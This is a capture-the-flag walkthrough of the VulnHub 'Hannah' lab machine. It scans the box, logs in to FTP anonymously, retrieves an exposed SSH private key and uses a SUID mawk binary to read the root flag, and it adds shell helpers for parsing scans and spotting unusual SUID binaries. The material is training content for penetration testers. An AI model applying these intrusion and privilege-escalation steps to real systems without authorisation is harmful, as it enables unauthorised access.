Vulnhub: Shelldredd #1 Hannah Walkthrough
Hey there my fellow hackers, here's a write-up of the Hannah box from VulnHub. You can download it from https://www.vulnhub.com/entry/onsystem-shelldredd-1-hannah,545/.
So let's start the pentest.
Scanning Network :
Using the netdiscover command, we'll find the IP address of the machine along with its MAC address.
sudo netdiscover -r 10.0.2.0/24

Now we'll port-scan that IP to find the open ports and the services running on them (with -A, nmap also runs version detection, OS detection and its default NSE scripts) and save the output in a file named nmap.txt.
nmap -A -T4 -p- 10.0.2.47 > nmap.txt

As we can see there are only 2 ports open: 21 (FTP) and 61000 (SSH). Note that SSH is not on its default port 22; we'll need to pass -p 61000 later.
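Rather than eyeballing nmap.txt, the open ports, the ssh port and the anonymous-FTP hint from the ftp-anon script can be pulled out of the saved output. This is an added example, not part of the original walkthrough; NMAP_SAMPLE is a constructed, abbreviated imitation of nmap's normal output shaped like this box's results (the real scan is not reproduced here), and on a live engagement you would pass "$(cat nmap.txt)" instead.

```shell
# Constructed sample of `nmap -A` normal output (not the real scan of 10.0.2.47).
NMAP_SAMPLE='Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.0.2.47
Host is up (0.00040s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
61000/tcp open  ssh     OpenSSH (protocol 2.0)
Nmap done: 1 IP address (1 host up) scanned in 30.00 seconds'

# Print "port/proto:service" for every open port, space separated, from the
# nmap normal output passed as $1.
open_ports() {
    printf '%s\n' "$1" | awk '
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { out = out (out ? " " : "") $1 ":" $3 }
        END { print out }'
}

# Exit 0 if the ftp-anon NSE script reported that anonymous login works.
anon_ftp_allowed() {
    printf '%s\n' "$1" | grep -q 'ftp-anon: Anonymous FTP login allowed'
}

# Print the port number of the open ssh service, so the ssh command can be
# built without assuming the default port 22 (on this box it is 61000).
ssh_port() {
    printf '%s\n' "$1" | awk '$2 == "open" && $3 == "ssh" { split($1, a, "/"); print a[1]; exit }'
}

echo "open: $(open_ports "$NMAP_SAMPLE")"
if anon_ftp_allowed "$NMAP_SAMPLE"; then echo "anonymous FTP login allowed"; fi
echo "ssh -i id_rsa hannah@10.0.2.47 -p $(ssh_port "$NMAP_SAMPLE")"
```

The ftp-anon line is what tells you anonymous login is worth trying before you touch the service; ssh_port is there because a non-default SSH port is easy to overlook when the PORT column is scanned by eye.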
Enumeration :
The FTP server accepts anonymous login (username anonymous, any password), so let's log in and enumerate further.
ftp 10.0.2.47

Okay, so we're in. Running ls lists the working directory but shows nothing; running ls -la to include hidden files and directories, we get

We'll move into the hidden directory (.hannah) and list its contents with ls.

There is an id_rsa file (a private SSH key). We'll download it to our local system with the get command and then exit.
Pre-Exploitation :
Now that we have the SSH key on our local system, the first concern is its permissions. OpenSSH refuses to use a private key that is readable by group or others (it warns "UNPROTECTED PRIVATE KEY FILE!" and ignores the key), so the file must be readable and writable by its owner only, i.e. mode 600.
chmod 600 id_rsa

After setting the permissions, we'll log in with the key. Remember that SSH is listening on port 61000, not the default 22.
ssh -i id_rsa hannah@10.0.2.47 -p 61000

and here we get the user's access.
Running ls lists the contents, where we find the user flag; cat reads it.
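The chmod 600 step above is the one people skip and then lose time on, so here is a small check that tests a downloaded key the way OpenSSH does (group and other bits must be clear) and fixes it. This is an added example, not part of the original walkthrough; it runs on a throwaway temporary file rather than a real key, and it reads the mode with ls -l because stat's flags differ between GNU and BSD.

```shell
# Print "ok" when group and others have no permission bits on $1, "unsafe"
# otherwise. ssh rejects an "unsafe" key with
#   Permissions 0644 for 'id_rsa' are too open. ... bad permissions: ignore key
# Characters 5-10 of `ls -l` are the group and other permission bits.
key_perm_status() {
    mode=$(ls -ld "$1" | cut -c5-10)
    if [ "$mode" = "------" ]; then echo ok; else echo unsafe; fi
}

# Restrict the key to owner read/write (0600), then report the new status.
fix_key_perms() {
    chmod 600 "$1"
    key_perm_status "$1"
}

# Demo on a throwaway file (not a real key), deliberately made world-readable
# first, which is how a key fetched over FTP or a browser typically lands.
demo_key=$(mktemp)
chmod 644 "$demo_key"
echo "before: $(key_perm_status "$demo_key")"   # unsafe
echo "after:  $(fix_key_perms "$demo_key")"     # ok
rm -f "$demo_key"
```

Run key_perm_status against id_rsa before the ssh command; if it prints unsafe, fix_key_perms is the same chmod 600 the walkthrough uses.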

Post-Exploitation :
Now we check whether we can run anything with sudo,
sudo -l

We can also enumerate all binaries with the SUID bit set using find,
find / -perm -u=s -type f 2>/dev/null

We find that the mawk binary has the SUID bit set. Let's exploit it.
Priv-Esc :
/usr/bin/mawk stands out as the most likely route to privilege escalation. Because the SUID bit is set, mawk runs with root's effective uid and does not drop it, so any file we pass to it is opened as root; we can use it for a privileged read of /root/root.txt.
First we'll put the path of the file we want to read (/root/root.txt) in an environment variable:
ROOT_FLAG=/root/root.txt

We then run mawk and pass in the variable. The empty pattern // matches every line, so the whole file is printed:
mawk '//' "$ROOT_FLAG"
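The find output on a real box is long, and most entries (passwd, su, sudo, mount, ...) are setuid on any stock install. The example below, which is added here and is not part of the original walkthrough, drops those against a baseline so the odd one out (mawk) stands out, and wraps the walkthrough's read in a function. SUID_BASELINE is an assumed Debian-style list and should be extended for the distro at hand; SUID_SAMPLE is a constructed stand-in for the find output, not real output from the box.

```shell
# Assumed baseline of binaries that are setuid on a stock Debian-style install.
SUID_BASELINE='passwd su sudo mount umount chsh chfn gpasswd newgrp'

# Constructed stand-in for `find / -perm -u=s -type f 2>/dev/null` output.
SUID_SAMPLE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/mawk
/bin/su
/bin/mount'

# Print the paths from $1 (one per line) whose basename is not in the baseline.
suid_candidates() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        case " $SUID_BASELINE " in
            *" $name "*) ;;                 # stock setuid binary, ignore
            *) printf '%s\n' "$path" ;;     # unusual, worth a look
        esac
    done
}

# Read file $2 with the awk binary $1 (default mawk). '//' matches every line,
# so the whole file is printed. When $1 is setuid root the open() happens with
# root's effective uid, so the file need not be readable by the calling user.
awk_read() {
    "${1:-mawk}" '//' "$2"
}

echo "non-baseline SUID binaries:"
suid_candidates "$SUID_SAMPLE"
# awk_read /usr/bin/mawk /root/root.txt    # the walkthrough's privileged read
```

Pipe the real find output into suid_candidates (for example suid_candidates "$(find / -perm -u=s -type f 2>/dev/null)"); anything it prints is the first thing to look up before spending time on the stock entries.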

We've captured the root flag!
I hope you found this useful. Feel free to comment on anything I missed or got wrong. Thanks :)